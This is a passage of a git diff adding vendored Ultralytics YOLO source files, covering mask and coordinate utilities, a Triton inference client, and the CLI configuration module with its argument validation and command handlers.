1, n) + xp = np.arange(len(s)) + segments[i] = ( + np.concatenate([np.interp(x, xp, s[:, i]) for i in range(2)], dtype=np.float32).reshape(2, -1).T + ) # segment xy + return segments + + +def crop_mask(masks, boxes): + """ + It takes a mask and a bounding box, and returns a mask that is cropped to the bounding box. + + Args: + masks (torch.Tensor): [n, h, w] tensor of masks + boxes (torch.Tensor): [n, 4] tensor of bbox coordinates in relative point form + + Returns: + (torch.Tensor): The masks are being cropped to the bounding box. + """ + _, h, w = masks.shape + x1, y1, x2, y2 = torch.chunk(boxes[:, :, None], 4, 1) # x1 shape(n,1,1) + r = torch.arange(w, device=masks.device, dtype=x1.dtype)[None, None, :] # rows shape(1,1,w) + c = torch.arange(h, device=masks.device, dtype=x1.dtype)[None, :, None] # cols shape(1,h,1) + + return masks * ((r >= x1) * (r < x2) * (c >= y1) * (c < y2)) + + +def process_mask(protos, masks_in, bboxes, shape, upsample=False): + """ + Apply masks to bounding boxes using the output of the mask head. + + Args: + protos (torch.Tensor): A tensor of shape [mask_dim, mask_h, mask_w]. + masks_in (torch.Tensor): A tensor of shape [n, mask_dim], where n is the number of masks after NMS. + bboxes (torch.Tensor): A tensor of shape [n, 4], where n is the number of masks after NMS. + shape (tuple): A tuple of integers representing the size of the input image in the format (h, w). + upsample (bool): A flag to indicate whether to upsample the mask to the original image size. Default is False. + + Returns: + (torch.Tensor): A binary mask tensor of shape [n, h, w], where n is the number of masks after NMS, and h and w + are the height and width of the input image. The mask is applied to the bounding boxes. + """ + c, mh, mw = protos.shape # CHW + ih, iw = shape + masks = (masks_in @ protos.float().view(c, -1)).view(-1, mh, mw) # CHW + width_ratio = mw / iw + height_ratio = mh / ih + + downsampled_bboxes = bboxes.clone() + downsampled_bboxes[:, 0] *= width_ratio + downsampled_bboxes[:, 2] *= width_ratio + downsampled_bboxes[:, 3] *= height_ratio + downsampled_bboxes[:, 1] *= height_ratio + + masks = crop_mask(masks, downsampled_bboxes) # CHW + if upsample: + masks = F.interpolate(masks[None], shape, mode="bilinear", align_corners=False)[0] # CHW + return masks.gt_(0.0) + + +def process_mask_native(protos, masks_in, bboxes, shape): + """ + It takes the output of the mask head, and crops it after upsampling to the bounding boxes. + + Args: + protos (torch.Tensor): [mask_dim, mask_h, mask_w] + masks_in (torch.Tensor): [n, mask_dim], n is number of masks after nms. + bboxes (torch.Tensor): [n, 4], n is number of masks after nms. + shape (tuple): The size of the input image (h,w). + + Returns: + masks (torch.Tensor): The returned masks with dimensions [h, w, n]. + """ + c, mh, mw = protos.shape # CHW + masks = (masks_in @ protos.float().view(c, -1)).view(-1, mh, mw) + masks = scale_masks(masks[None], shape)[0] # CHW + masks = crop_mask(masks, bboxes) # CHW + return masks.gt_(0.0) + + +def scale_masks(masks, shape, padding=True): + """ + Rescale segment masks to shape. + + Args: + masks (torch.Tensor): (N, C, H, W). + shape (tuple): Height and width. + padding (bool): If True, assuming the boxes is based on image augmented by yolo style. If False then do regular + rescaling. + """ + mh, mw = masks.shape[2:] + gain = min(mh / shape[0], mw / shape[1]) # gain = old / new + pad = [mw - shape[1] * gain, mh - shape[0] * gain] # wh padding + if padding: + pad[0] /= 2 + pad[1] /= 2 + top, left = (int(pad[1]), int(pad[0])) if padding else (0, 0) # y, x + bottom, right = (int(mh - pad[1]), int(mw - pad[0])) + masks = masks[..., top:bottom, left:right] + + masks = F.interpolate(masks, shape, mode="bilinear", align_corners=False) # NCHW + return masks + + +def scale_coords(img1_shape, coords, img0_shape, ratio_pad=None, normalize=False, padding=True): + """ + Rescale segment coordinates (xy) from img1_shape to img0_shape. + + Args: + img1_shape (tuple): The shape of the image that the coords are from. + coords (torch.Tensor): the coords to be scaled of shape n,2. + img0_shape (tuple): the shape of the image that the segmentation is being applied to. + ratio_pad (tuple): the ratio of the image size to the padded image size. + normalize (bool): If True, the coordinates will be normalized to the range [0, 1]. Defaults to False. + padding (bool): If True, assuming the boxes is based on image augmented by yolo style. If False then do regular + rescaling. + + Returns: + coords (torch.Tensor): The scaled coordinates. + """ + if ratio_pad is None: # calculate from img0_shape + gain = min(img1_shape[0] / img0_shape[0], img1_shape[1] / img0_shape[1]) # gain = old / new + pad = (img1_shape[1] - img0_shape[1] * gain) / 2, (img1_shape[0] - img0_shape[0] * gain) / 2 # wh padding + else: + gain = ratio_pad[0][0] + pad = ratio_pad[1] + + if padding: + coords[..., 0] -= pad[0] # x padding + coords[..., 1] -= pad[1] # y padding + coords[..., 0] /= gain + coords[..., 1] /= gain + coords = clip_coords(coords, img0_shape) + if normalize: + coords[..., 0] /= img0_shape[1] # width + coords[..., 1] /= img0_shape[0] # height + return coords + + +def regularize_rboxes(rboxes): + """ + Regularize rotated boxes in range [0, pi/2]. + + Args: + rboxes (torch.Tensor): Input boxes of shape(N, 5) in xywhr format. + + Returns: + (torch.Tensor): The regularized boxes. + """ + x, y, w, h, t = rboxes.unbind(dim=-1) + # Swap edge and angle if h >= w + w_ = torch.where(w > h, w, h) + h_ = torch.where(w > h, h, w) + t = torch.where(w > h, t, t + math.pi / 2) % math.pi + return torch.stack([x, y, w_, h_, t], dim=-1) # regularized boxes + + +def masks2segments(masks, strategy="all"): + """ + It takes a list of masks(n,h,w) and returns a list of segments(n,xy). + + Args: + masks (torch.Tensor): the output of the model, which is a tensor of shape (batch_size, 160, 160) + strategy (str): 'all' or 'largest'. Defaults to all + + Returns: + segments (List): list of segment masks + """ + from ultralytics.data.converter import merge_multi_segment + + segments = [] + for x in masks.int().cpu().numpy().astype("uint8"): + c = cv2.findContours(x, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[0] + if c: + if strategy == "all": # merge and concatenate all segments + c = ( + np.concatenate(merge_multi_segment([x.reshape(-1, 2) for x in c])) + if len(c) > 1 + else c[0].reshape(-1, 2) + ) + elif strategy == "largest": # select largest segment + c = np.array(c[np.array([len(x) for x in c]).argmax()]).reshape(-1, 2) + else: + c = np.zeros((0, 2)) # no segments found + segments.append(c.astype("float32")) + return segments + + +def convert_torch2numpy_batch(batch: torch.Tensor) -> np.ndarray: + """ + Convert a batch of FP32 torch tensors (0.0-1.0) to a NumPy uint8 array (0-255), changing from BCHW to BHWC layout. + + Args: + batch (torch.Tensor): Input tensor batch of shape (Batch, Channels, Height, Width) and dtype torch.float32. + + Returns: + (np.ndarray): Output NumPy array batch of shape (Batch, Height, Width, Channels) and dtype uint8. + """ + return (batch.permute(0, 2, 3, 1).contiguous() * 255).clamp(0, 255).to(torch.uint8).cpu().numpy() + + +def clean_str(s): + """ + Cleans a string by replacing special characters with '_' character. + + Args: + s (str): a string needing special characters replaced + + Returns: + (str): a string with special characters replaced by an underscore _ + """ + return re.sub(pattern="[|@#!¡·$€%&()=?¿^*;:,¨´><+]", repl="_", string=s) diff --git a/2024.ultralytics/v8.3.41/utils/triton.py b/2024.ultralytics/v8.3.41/utils/triton.py new file mode 100644 index 0000000..3f873a6 --- /dev/null +++ b/2024.ultralytics/v8.3.41/utils/triton.py @@ -0,0 +1,92 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +from typing import List +from urllib.parse import urlsplit + +import numpy as np + + +class TritonRemoteModel: + """ + Client for interacting with a remote Triton Inference Server model. + + Attributes: + endpoint (str): The name of the model on the Triton server. + url (str): The URL of the Triton server. + triton_client: The Triton client (either HTTP or gRPC). + InferInput: The input class for the Triton client. + InferRequestedOutput: The output request class for the Triton client. + input_formats (List[str]): The data types of the model inputs. + np_input_formats (List[type]): The numpy data types of the model inputs. + input_names (List[str]): The names of the model inputs. + output_names (List[str]): The names of the model outputs. + """ + + def __init__(self, url: str, endpoint: str = "", scheme: str = ""): + """ + Initialize the TritonRemoteModel. + + Arguments may be provided individually or parsed from a collective 'url' argument of the form + ://// + + Args: + url (str): The URL of the Triton server. + endpoint (str): The name of the model on the Triton server. + scheme (str): The communication scheme ('http' or 'grpc'). + """ + if not endpoint and not scheme: # Parse all args from URL string + splits = urlsplit(url) + endpoint = splits.path.strip("/").split("/")[0] + scheme = splits.scheme + url = splits.netloc + + self.endpoint = endpoint + self.url = url + + # Choose the Triton client based on the communication scheme + if scheme == "http": + import tritonclient.http as client # noqa + + self.triton_client = client.InferenceServerClient(url=self.url, verbose=False, ssl=False) + config = self.triton_client.get_model_config(endpoint) + else: + import tritonclient.grpc as client # noqa + + self.triton_client = client.InferenceServerClient(url=self.url, verbose=False, ssl=False) + config = self.triton_client.get_model_config(endpoint, as_json=True)["config"] + + # Sort output names alphabetically, i.e. 'output0', 'output1', etc. + config["output"] = sorted(config["output"], key=lambda x: x.get("name")) + + # Define model attributes + type_map = {"TYPE_FP32": np.float32, "TYPE_FP16": np.float16, "TYPE_UINT8": np.uint8} + self.InferRequestedOutput = client.InferRequestedOutput + self.InferInput = client.InferInput + self.input_formats = [x["data_type"] for x in config["input"]] + self.np_input_formats = [type_map[x] for x in self.input_formats] + self.input_names = [x["name"] for x in config["input"]] + self.output_names = [x["name"] for x in config["output"]] + + def __call__(self, *inputs: np.ndarray) -> List[np.ndarray]: + """ + Call the model with the given inputs. + + Args: + *inputs (List[np.ndarray]): Input data to the model. + + Returns: + (List[np.ndarray]): Model outputs. + """ + infer_inputs = [] + input_format = inputs[0].dtype + for i, x in enumerate(inputs): + if x.dtype != self.np_input_formats[i]: + x = x.astype(self.np_input_formats[i]) + infer_input = self.InferInput(self.input_names[i], [*x.shape], self.input_formats[i].replace("TYPE_", "")) + infer_input.set_data_from_numpy(x) + infer_inputs.append(infer_input) + + infer_outputs = [self.InferRequestedOutput(output_name) for output_name in self.output_names] + outputs = self.triton_client.infer(model_name=self.endpoint, inputs=infer_inputs, outputs=infer_outputs) + + return [outputs.as_numpy(output_name).astype(input_format) for output_name in self.output_names] diff --git a/2024.ultralytics/v8.3.44/__init__.py b/2024.ultralytics/v8.3.44/__init__.py new file mode 100644 index 0000000..9d19f6a --- /dev/null +++ b/2024.ultralytics/v8.3.44/__init__.py @@ -0,0 +1,29 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +__version__ = "8.3.44" + +import os + +# Set ENV variables (place before imports) +if not os.environ.get("OMP_NUM_THREADS"): + os.environ["OMP_NUM_THREADS"] = "1" # default for reduced CPU utilization during training + +from ultralytics.models import NAS, RTDETR, SAM, YOLO, FastSAM, YOLOWorld +from ultralytics.utils import ASSETS, SETTINGS +from ultralytics.utils.checks import check_yolo as checks +from ultralytics.utils.downloads import download + +settings = SETTINGS +__all__ = ( + "__version__", + "ASSETS", + "YOLO", + "YOLOWorld", + "NAS", + "SAM", + "FastSAM", + "RTDETR", + "checks", + "download", + "settings", +) diff --git a/2024.ultralytics/v8.3.44/cfg/__init__.py b/2024.ultralytics/v8.3.44/cfg/__init__.py new file mode 100644 index 0000000..b36418f --- /dev/null +++ b/2024.ultralytics/v8.3.44/cfg/__init__.py @@ -0,0 +1,1014 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +import shutil +import subprocess +import sys +from pathlib import Path +from types import SimpleNamespace +from typing import Dict, List, Union + +import cv2 + +from ultralytics.utils import ( + ASSETS, + DEFAULT_CFG, + DEFAULT_CFG_DICT, + DEFAULT_CFG_PATH, + DEFAULT_SOL_DICT, + IS_VSCODE, + LOGGER, + RANK, + ROOT, + RUNS_DIR, + SETTINGS, + SETTINGS_FILE, + TESTS_RUNNING, + IterableSimpleNamespace, + __version__, + checks, + colorstr, + deprecation_warn, + vscode_msg, + yaml_load, + yaml_print, +) + +# Define valid solutions +SOLUTION_MAP = { + "count": ("ObjectCounter", "count"), + "heatmap": ("Heatmap", "generate_heatmap"), + "queue": ("QueueManager", "process_queue"), + "speed": ("SpeedEstimator", "estimate_speed"), + "workout": ("AIGym", "monitor"), + "analytics": ("Analytics", "process_data"), + "trackzone": ("TrackZone", "trackzone"), + "help": None, +} + +# Define valid tasks and modes +MODES = {"train", "val", "predict", "export", "track", "benchmark"} +TASKS = {"detect", "segment", "classify", "pose", "obb"} +TASK2DATA = { + "detect": "coco8.yaml", + "segment": "coco8-seg.yaml", + "classify": "imagenet10", + "pose": "coco8-pose.yaml", + "obb": "dota8.yaml", +} +TASK2MODEL = { + "detect": "yolo11n.pt", + "segment": "yolo11n-seg.pt", + "classify": "yolo11n-cls.pt", + "pose": "yolo11n-pose.pt", + "obb": "yolo11n-obb.pt", +} +TASK2METRIC = { + "detect": "metrics/mAP50-95(B)", + "segment": "metrics/mAP50-95(M)", + "classify": "metrics/accuracy_top1", + "pose": "metrics/mAP50-95(P)", + "obb": "metrics/mAP50-95(B)", +} +MODELS = {TASK2MODEL[task] for task in TASKS} + +ARGV = sys.argv or ["", ""] # sometimes sys.argv = [] +SOLUTIONS_HELP_MSG = f""" + Arguments received: {str(['yolo'] + ARGV[1:])}. Ultralytics 'yolo solutions' usage overview: + + yolo solutions SOLUTION ARGS + + Where SOLUTION (optional) is one of {list(SOLUTION_MAP.keys())[:-1]} + ARGS (optional) are any number of custom 'arg=value' pairs like 'show_in=True' that override defaults + at https://docs.ultralytics.com/usage/cfg + + 1. Call object counting solution + yolo solutions count source="path/to/video/file.mp4" region=[(20, 400), (1080, 400), (1080, 360), (20, 360)] + + 2. Call heatmaps solution + yolo solutions heatmap colormap=cv2.COLORMAP_PARAULA model=yolo11n.pt + + 3. Call queue management solution + yolo solutions queue region=[(20, 400), (1080, 400), (1080, 360), (20, 360)] model=yolo11n.pt + + 4. Call workouts monitoring solution for push-ups + yolo solutions workout model=yolo11n-pose.pt kpts=[6, 8, 10] + + 5. Generate analytical graphs + yolo solutions analytics analytics_type="pie" + + 6. Track objects within specific zones + yolo solutions trackzone source="path/to/video/file.mp4" region=[(150, 150), (1130, 150), (1130, 570), (150, 570)] + """ +CLI_HELP_MSG = f""" + Arguments received: {str(['yolo'] + ARGV[1:])}. Ultralytics 'yolo' commands use the following syntax: + + yolo TASK MODE ARGS + + Where TASK (optional) is one of {TASKS} + MODE (required) is one of {MODES} + ARGS (optional) are any number of custom 'arg=value' pairs like 'imgsz=320' that override defaults. + See all ARGS at https://docs.ultralytics.com/usage/cfg or with 'yolo cfg' + + 1. Train a detection model for 10 epochs with an initial learning_rate of 0.01 + yolo train data=coco8.yaml model=yolo11n.pt epochs=10 lr0=0.01 + + 2. Predict a YouTube video using a pretrained segmentation model at image size 320: + yolo predict model=yolo11n-seg.pt source='https://youtu.be/LNwODJXcvt4' imgsz=320 + + 3. Val a pretrained detection model at batch-size 1 and image size 640: + yolo val model=yolo11n.pt data=coco8.yaml batch=1 imgsz=640 + + 4. Export a YOLO11n classification model to ONNX format at image size 224 by 128 (no TASK required) + yolo export model=yolo11n-cls.pt format=onnx imgsz=224,128 + + 5. Streamlit real-time webcam inference GUI + yolo streamlit-predict + + 6. Ultralytics solutions usage + yolo solutions count or in {list(SOLUTION_MAP.keys())[1:-1]} source="path/to/video/file.mp4" + + 7. Run special commands: + yolo help + yolo checks + yolo version + yolo settings + yolo copy-cfg + yolo cfg + yolo solutions help + + Docs: https://docs.ultralytics.com + Solutions: https://docs.ultralytics.com/solutions/ + Community: https://community.ultralytics.com + GitHub: https://github.com/ultralytics/ultralytics + """ + +# Define keys for arg type checks +CFG_FLOAT_KEYS = { # integer or float arguments, i.e. x=2 and x=2.0 + "warmup_epochs", + "box", + "cls", + "dfl", + "degrees", + "shear", + "time", + "workspace", + "batch", +} +CFG_FRACTION_KEYS = { # fractional float arguments with 0.0<=values<=1.0 + "dropout", + "lr0", + "lrf", + "momentum", + "weight_decay", + "warmup_momentum", + "warmup_bias_lr", + "hsv_h", + "hsv_s", + "hsv_v", + "translate", + "scale", + "perspective", + "flipud", + "fliplr", + "bgr", + "mosaic", + "mixup", + "copy_paste", + "conf", + "iou", + "fraction", +} +CFG_INT_KEYS = { # integer-only arguments + "epochs", + "patience", + "workers", + "seed", + "close_mosaic", + "mask_ratio", + "max_det", + "vid_stride", + "line_width", + "nbs", + "save_period", +} +CFG_BOOL_KEYS = { # boolean-only arguments + "save", + "exist_ok", + "verbose", + "deterministic", + "single_cls", + "rect", + "cos_lr", + "overlap_mask", + "val", + "save_json", + "save_hybrid", + "half", + "dnn", + "plots", + "show", + "save_txt", + "save_conf", + "save_crop", + "save_frames", + "show_labels", + "show_conf", + "visualize", + "augment", + "agnostic_nms", + "retina_masks", + "show_boxes", + "keras", + "optimize", + "int8", + "dynamic", + "simplify", + "nms", + "profile", + "multi_scale", +} + + +def cfg2dict(cfg): + """ + Converts a configuration object to a dictionary. + + Args: + cfg (str | Path | Dict | SimpleNamespace): Configuration object to be converted. Can be a file path, + a string, a dictionary, or a SimpleNamespace object. + + Returns: + (Dict): Configuration object in dictionary format. + + Examples: + Convert a YAML file path to a dictionary: + >>> config_dict = cfg2dict("config.yaml") + + Convert a SimpleNamespace to a dictionary: + >>> from types import SimpleNamespace + >>> config_sn = SimpleNamespace(param1="value1", param2="value2") + >>> config_dict = cfg2dict(config_sn) + + Pass through an already existing dictionary: + >>> config_dict = cfg2dict({"param1": "value1", "param2": "value2"}) + + Notes: + - If cfg is a path or string, it's loaded as YAML and converted to a dictionary. + - If cfg is a SimpleNamespace object, it's converted to a dictionary using vars(). + - If cfg is already a dictionary, it's returned unchanged. + """ + if isinstance(cfg, (str, Path)): + cfg = yaml_load(cfg) # load dict + elif isinstance(cfg, SimpleNamespace): + cfg = vars(cfg) # convert to dict + return cfg + + +def get_cfg(cfg: Union[str, Path, Dict, SimpleNamespace] = DEFAULT_CFG_DICT, overrides: Dict = None): + """ + Load and merge configuration data from a file or dictionary, with optional overrides. + + Args: + cfg (str | Path | Dict | SimpleNamespace): Configuration data source. Can be a file path, dictionary, or + SimpleNamespace object. + overrides (Dict | None): Dictionary containing key-value pairs to override the base configuration. + + Returns: + (SimpleNamespace): Namespace containing the merged configuration arguments. + + Examples: + >>> from ultralytics.cfg import get_cfg + >>> config = get_cfg() # Load default configuration + >>> config = get_cfg("path/to/config.yaml", overrides={"epochs": 50, "batch_size": 16}) + + Notes: + - If both `cfg` and `overrides` are provided, the values in `overrides` will take precedence. + - Special handling ensures alignment and correctness of the configuration, such as converting numeric + `project` and `name` to strings and validating configuration keys and values. + - The function performs type and value checks on the configuration data. + """ + cfg = cfg2dict(cfg) + + # Merge overrides + if overrides: + overrides = cfg2dict(overrides) + if "save_dir" not in cfg: + overrides.pop("save_dir", None) # special override keys to ignore + check_dict_alignment(cfg, overrides) + cfg = {**cfg, **overrides} # merge cfg and overrides dicts (prefer overrides) + + # Special handling for numeric project/name + for k in "project", "name": + if k in cfg and isinstance(cfg[k], (int, float)): + cfg[k] = str(cfg[k]) + if cfg.get("name") == "model": # assign model to 'name' arg + cfg["name"] = cfg.get("model", "").split(".")[0] + LOGGER.warning(f"WARNING ⚠️ 'name=model' automatically updated to 'name={cfg['name']}'.") + + # Type and Value checks + check_cfg(cfg) + + # Return instance + return IterableSimpleNamespace(**cfg) + + +def check_cfg(cfg, hard=True): + """ + Checks configuration argument types and values for the Ultralytics library. + + This function validates the types and values of configuration arguments, ensuring correctness and converting + them if necessary. It checks for specific key types defined in global variables such as CFG_FLOAT_KEYS, + CFG_FRACTION_KEYS, CFG_INT_KEYS, and CFG_BOOL_KEYS. + + Args: + cfg (Dict): Configuration dictionary to validate. + hard (bool): If True, raises exceptions for invalid types and values; if False, attempts to convert them. + + Examples: + >>> config = { + ... "epochs": 50, # valid integer + ... "lr0": 0.01, # valid float + ... "momentum": 1.2, # invalid float (out of 0.0-1.0 range) + ... "save": "true", # invalid bool + ... } + >>> check_cfg(config, hard=False) + >>> print(config) + {'epochs': 50, 'lr0': 0.01, 'momentum': 1.2, 'save': False} # corrected 'save' key + + Notes: + - The function modifies the input dictionary in-place. + - None values are ignored as they may be from optional arguments. + - Fraction keys are checked to be within the range [0.0, 1.0]. + """ + for k, v in cfg.items(): + if v is not None: # None values may be from optional args + if k in CFG_FLOAT_KEYS and not isinstance(v, (int, float)): + if hard: + raise TypeError( + f"'{k}={v}' is of invalid type {type(v).__name__}. " + f"Valid '{k}' types are int (i.e. '{k}=0') or float (i.e. '{k}=0.5')" + ) + cfg[k] = float(v) + elif k in CFG_FRACTION_KEYS: + if not isinstance(v, (int, float)): + if hard: + raise TypeError( + f"'{k}={v}' is of invalid type {type(v).__name__}. " + f"Valid '{k}' types are int (i.e. '{k}=0') or float (i.e. '{k}=0.5')" + ) + cfg[k] = v = float(v) + if not (0.0 <= v <= 1.0): + raise ValueError(f"'{k}={v}' is an invalid value. " f"Valid '{k}' values are between 0.0 and 1.0.") + elif k in CFG_INT_KEYS and not isinstance(v, int): + if hard: + raise TypeError( + f"'{k}={v}' is of invalid type {type(v).__name__}. " f"'{k}' must be an int (i.e. '{k}=8')" + ) + cfg[k] = int(v) + elif k in CFG_BOOL_KEYS and not isinstance(v, bool): + if hard: + raise TypeError( + f"'{k}={v}' is of invalid type {type(v).__name__}. " + f"'{k}' must be a bool (i.e. '{k}=True' or '{k}=False')" + ) + cfg[k] = bool(v) + + +def get_save_dir(args, name=None): + """ + Returns the directory path for saving outputs, derived from arguments or default settings. + + Args: + args (SimpleNamespace): Namespace object containing configurations such as 'project', 'name', 'task', + 'mode', and 'save_dir'. + name (str | None): Optional name for the output directory. If not provided, it defaults to 'args.name' + or the 'args.mode'. + + Returns: + (Path): Directory path where outputs should be saved. + + Examples: + >>> from types import SimpleNamespace + >>> args = SimpleNamespace(project="my_project", task="detect", mode="train", exist_ok=True) + >>> save_dir = get_save_dir(args) + >>> print(save_dir) + my_project/detect/train + """ + if getattr(args, "save_dir", None): + save_dir = args.save_dir + else: + from ultralytics.utils.files import increment_path + + project = args.project or (ROOT.parent / "tests/tmp/runs" if TESTS_RUNNING else RUNS_DIR) / args.task + name = name or args.name or f"{args.mode}" + save_dir = increment_path(Path(project) / name, exist_ok=args.exist_ok if RANK in {-1, 0} else True) + + return Path(save_dir) + + +def _handle_deprecation(custom): + """ + Handles deprecated configuration keys by mapping them to current equivalents with deprecation warnings. + + Args: + custom (Dict): Configuration dictionary potentially containing deprecated keys. + + Examples: + >>> custom_config = {"boxes": True, "hide_labels": "False", "line_thickness": 2} + >>> _handle_deprecation(custom_config) + >>> print(custom_config) + {'show_boxes': True, 'show_labels': True, 'line_width': 2} + + Notes: + This function modifies the input dictionary in-place, replacing deprecated keys with their current + equivalents. It also handles value conversions where necessary, such as inverting boolean values for + 'hide_labels' and 'hide_conf'. + """ + for key in custom.copy().keys(): + if key == "boxes": + deprecation_warn(key, "show_boxes") + custom["show_boxes"] = custom.pop("boxes") + if key == "hide_labels": + deprecation_warn(key, "show_labels") + custom["show_labels"] = custom.pop("hide_labels") == "False" + if key == "hide_conf": + deprecation_warn(key, "show_conf") + custom["show_conf"] = custom.pop("hide_conf") == "False" + if key == "line_thickness": + deprecation_warn(key, "line_width") + custom["line_width"] = custom.pop("line_thickness") + if key == "label_smoothing": + deprecation_warn(key) + custom.pop("label_smoothing") + + return custom + + +def check_dict_alignment(base: Dict, custom: Dict, e=None): + """ + Checks alignment between custom and base configuration dictionaries, handling deprecated keys and providing error + messages for mismatched keys. + + Args: + base (Dict): The base configuration dictionary containing valid keys. + custom (Dict): The custom configuration dictionary to be checked for alignment. + e (Exception | None): Optional error instance passed by the calling function. + + Raises: + SystemExit: If mismatched keys are found between the custom and base dictionaries. + + Examples: + >>> base_cfg = {"epochs": 50, "lr0": 0.01, "batch_size": 16} + >>> custom_cfg = {"epoch": 100, "lr": 0.02, "batch_size": 32} + >>> try: + ... check_dict_alignment(base_cfg, custom_cfg) + ... except SystemExit: + ... print("Mismatched keys found") + + Notes: + - Suggests corrections for mismatched keys based on similarity to valid keys. + - Automatically replaces deprecated keys in the custom configuration with updated equivalents. + - Prints detailed error messages for each mismatched key to help users correct their configurations. + """ + custom = _handle_deprecation(custom) + base_keys, custom_keys = (set(x.keys()) for x in (base, custom)) + mismatched = [k for k in custom_keys if k not in base_keys] + if mismatched: + from difflib import get_close_matches + + string = "" + for x in mismatched: + matches = get_close_matches(x, base_keys) # key list + matches = [f"{k}={base[k]}" if base.get(k) is not None else k for k in matches] + match_str = f"Similar arguments are i.e. {matches}." if matches else "" + string += f"'{colorstr('red', 'bold', x)}' is not a valid YOLO argument. {match_str}\n" + raise SyntaxError(string + CLI_HELP_MSG) from e + + +def merge_equals_args(args: List[str]) -> List[str]: + """ + Merges arguments around isolated '=' in a list of strings and joins fragments with brackets. + + This function handles the following cases: + 1. ['arg', '=', 'val'] becomes ['arg=val'] + 2. ['arg=', 'val'] becomes ['arg=val'] + 3. ['arg', '=val'] becomes ['arg=val'] + 4. Joins fragments with brackets, e.g., ['imgsz=[3,', '640,', '640]'] becomes ['imgsz=[3,640,640]'] + + Args: + args (List[str]): A list of strings where each element represents an argument or fragment. + + Returns: + List[str]: A list of strings where the arguments around isolated '=' are merged and fragments with brackets are joined. + + Examples: + >>> args = ["arg1", "=", "value", "arg2=", "value2", "arg3", "=value3", "imgsz=[3,", "640,", "640]"] + >>> merge_and_join_args(args) + ['arg1=value', 'arg2=value2', 'arg3=value3', 'imgsz=[3,640,640]'] + """ + new_args = [] + current = "" + depth = 0 + + i = 0 + while i < len(args): + arg = args[i] + + # Handle equals sign merging + if arg == "=" and 0 < i < len(args) - 1: # merge ['arg', '=', 'val'] + new_args[-1] += f"={args[i + 1]}" + i += 2 + continue + elif arg.endswith("=") and i < len(args) - 1 and "=" not in args[i + 1]: # merge ['arg=', 'val'] + new_args.append(f"{arg}{args[i + 1]}") + i += 2 + continue + elif arg.startswith("=") and i > 0: # merge ['arg', '=val'] + new_args[-1] += arg + i += 1 + continue + + # Handle bracket joining + depth += arg.count("[") - arg.count("]") + current += arg + if depth == 0: + new_args.append(current) + current = "" + + i += 1 + + # Append any remaining current string + if current: + new_args.append(current) + + return new_args + + +def handle_yolo_hub(args: List[str]) -> None: + """ + Handles Ultralytics HUB command-line interface (CLI) commands for authentication. + + This function processes Ultralytics HUB CLI commands such as login and logout. It should be called when executing a + script with arguments related to HUB authentication. + + Args: + args (List[str]): A list of command line arguments. The first argument should be either 'login' + or 'logout'. For 'login', an optional second argument can be the API key. + + Examples: + ```bash + yolo login YOUR_API_KEY + ``` + + Notes: + - The function imports the 'hub' module from ultralytics to perform login and logout operations. + - For the 'login' command, if no API key is provided, an empty string is passed to the login function. + - The 'logout' command does not require any additional arguments. + """ + from ultralytics import hub + + if args[0] == "login": + key = args[1] if len(args) > 1 else "" + # Log in to Ultralytics HUB using the provided API key + hub.login(key) + elif args[0] == "logout": + # Log out from Ultralytics HUB + hub.logout() + + +def handle_yolo_settings(args: List[str]) -> None: + """ + Handles YOLO settings command-line interface (CLI) commands. + + This function processes YOLO settings CLI commands such as reset and updating individual settings. It should be + called when executing a script with arguments related to YOLO settings management. + + Args: + args (List[str]): A list of command line arguments for YOLO settings management. + + Examples: + >>> handle_yolo_settings(["reset"]) # Reset YOLO settings + >>> handle_yolo_settings(["default_cfg_path=yolo11n.yaml"]) # Update a specific setting + + Notes: + - If no arguments are provided, the function will display the current settings. + - The 'reset' command will delete the existing settings file and create new default settings. + - Other arguments are treated as key-value pairs to update specific settings. + - The function will check for alignment between the provided settings and the existing ones. + - After processing, the updated settings will be displayed. + - For more information on handling YOLO settings, visit: + https://docs.ultralytics.com/quickstart/#ultralytics-settings + """ + url = "https://docs.ultralytics.com/quickstart/#ultralytics-settings" # help URL + try: + if any(args): + if args[0] == "reset": + SETTINGS_FILE.unlink() # delete the settings file + SETTINGS.reset() # create new settings + LOGGER.info("Settings reset successfully") # inform the user that settings have been reset + else: # save a new setting + new = dict(parse_key_value_pair(a) for a in args) + check_dict_alignment(SETTINGS, new) + SETTINGS.update(new) + + print(SETTINGS) # print the current settings + LOGGER.info(f"💡 Learn more about Ultralytics Settings at {url}") + except Exception as e: + LOGGER.warning(f"WARNING ⚠️ settings error: '{e}'. Please see {url} for help.") + + +def handle_yolo_solutions(args: List[str]) -> None: + """ + Processes YOLO solutions arguments and runs the specified computer vision solutions pipeline. + + Args: + args (List[str]): Command-line arguments for configuring and running the Ultralytics YOLO + solutions: https://docs.ultralytics.com/solutions/, It can include solution name, source, + and other configuration parameters. + + Returns: + None: The function processes video frames and saves the output but doesn't return any value. + + Examples: + Run people counting solution with default settings: + >>> handle_yolo_solutions(["count"]) + + Run analytics with custom configuration: + >>> handle_yolo_solutions(["analytics", "conf=0.25", "source=path/to/video/file.mp4"]) + + Notes: + - Default configurations are merged from DEFAULT_SOL_DICT and DEFAULT_CFG_DICT + - Arguments can be provided in the format 'key=value' or as boolean flags + - Available solutions are defined in SOLUTION_MAP with their respective classes and methods + - If an invalid solution is provided, defaults to 'count' solution + - Output videos are saved in 'runs/solution/{solution_name}' directory + - For 'analytics' solution, frame numbers are tracked for generating analytical graphs + - Video processing can be interrupted by pressing 'q' + - Processes video frames sequentially and saves output in .avi format + - If no source is specified, downloads and uses a default sample video + """ + full_args_dict = {**DEFAULT_SOL_DICT, **DEFAULT_CFG_DICT} # arguments dictionary + overrides = {} + + # check dictionary alignment + for arg in merge_equals_args(args): + arg = arg.lstrip("-").rstrip(",") + if "=" in arg: + try: + k, v = parse_key_value_pair(arg) + overrides[k] = v + except (NameError, SyntaxError, ValueError, AssertionError) as e: + check_dict_alignment(full_args_dict, {arg: ""}, e) + elif arg in full_args_dict and isinstance(full_args_dict.get(arg), bool): + overrides[arg] = True + check_dict_alignment(full_args_dict, overrides) # dict alignment + + # Get solution name + if args and args[0] in SOLUTION_MAP: + if args[0] != "help": + s_n = args.pop(0) # Extract the solution name directly + else: + LOGGER.info(SOLUTIONS_HELP_MSG) + else: + LOGGER.warning( + f"⚠️ No valid solution provided. Using default 'count'. Available: {', '.join(SOLUTION_MAP.keys())}" + ) + s_n = "count" # Default solution if none provided + + if args and args[0] == "help": # Add check 